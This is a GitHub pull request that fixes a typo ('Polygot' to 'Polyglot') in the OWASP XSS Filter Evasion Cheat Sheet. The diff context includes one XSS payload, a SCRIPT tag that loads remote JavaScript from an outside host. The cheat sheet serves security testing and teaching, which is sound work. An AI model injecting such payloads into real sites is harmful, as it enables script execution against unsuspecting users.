### PR TITLE
Update: [XSS Filter Evasion Cheat Sheet] #1255

### DIFF
--- a/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
+++ b/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
@@ -14,7 +14,7 @@ This is a normal XSS JavaScript injection, and most likely to get caught but I s
 
 `<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>`
 
-### XSS Locator (Polygot)
+### XSS Locator (Polyglot)
 
 The following is a "polyglot test XSS payload." This test will execute in multiple contexts including html, script string, js and URL. (Based on this [tweet](https://twitter.com/garethheyes/status/997466212190781445) by [Gareth Heyes](https://twitter.com/garethheyes)).
 


### PR DESCRIPTION
Polyglot typo in XSS Locator header. (as discussed in [#1255](https://github.com/OWASP/CheatSheetSeries/pull/1255#issuecomment-1845670716))

This PR covers issue #1255.
